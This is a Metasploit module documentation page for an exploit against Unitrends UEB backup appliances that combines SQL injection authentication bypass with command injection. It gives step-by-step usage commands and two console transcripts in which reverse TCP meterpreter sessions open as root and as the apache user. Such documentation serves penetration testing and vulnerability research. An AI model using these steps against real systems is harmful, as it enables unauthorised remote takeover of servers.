adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
baae9db092a4eaa4e6f3df65d22eded18d5fd20c
metasploit-gs/documentation/modules/exploit/linux/http/ueb_api_rce.md
T

94 lines
3.1 KiB
Markdown
Raw Normal View History

finish up docs and 10 exploit
2018-09-10 21:08:30 -04:00
## Vulnerable Application
This exploit leverages a sqli vulnerability for authentication bypass,
together with command injection for subsequent RCE.
This exploit has two targets:
1. Unitrends UEB 9 http api/storage RCE for root privileges
2. Unitrends UEB < 10.1.0 api/hosts RCE for user (apache) privileges
## Verification Steps
1. ```use exploit/linux/http/ueb_api_rce```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```set target [#]```
5. ```exploit```
6. A meterpreter session should have been opened successfully
## Scenarios
### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit
```
msf5 > use exploit/linux/http/ueb_api_rce
msf5 exploit(linux/http/ueb_api_rce) > set target 0
target => 0
msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf5 exploit(linux/http/ueb_api_rce) > exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress - 19.76% done (164/830 bytes)
[*] Command Stager progress - 39.16% done (325/830 bytes)
[*] Command Stager progress - 56.87% done (472/830 bytes)
[*] Command Stager progress - 74.82% done (621/830 bytes)
[*] Command Stager progress - 92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Command Stager progress - 126.63% done (1051/830 bytes)
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43600) at 2018-09-10 20:51:16 -0400
meterpreter > sysinfo
Computer : 1.1.1.1
OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit
```
msf5 > use exploit/linux/http/ueb_api_rce
msf5 exploit(linux/http/ueb_api_rce) > set target 1
target => 1
msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf5 exploit(linux/http/ueb_api_rce) > exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress - 19.76% done (164/830 bytes)
[*] Command Stager progress - 39.16% done (325/830 bytes)
[*] Command Stager progress - 56.87% done (472/830 bytes)
[*] Command Stager progress - 74.82% done (621/830 bytes)
[*] Command Stager progress - 92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43515) at 2018-09-10 20:46:24 -0400
[*] Command Stager progress - 126.63% done (1051/830 bytes)
meterpreter > sysinfo
Computer : 1.1.1.1
OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > shell
Process 25534 created.
Channel 1 created.
whoami
apache
```
Reference in New Issue Copy Permalink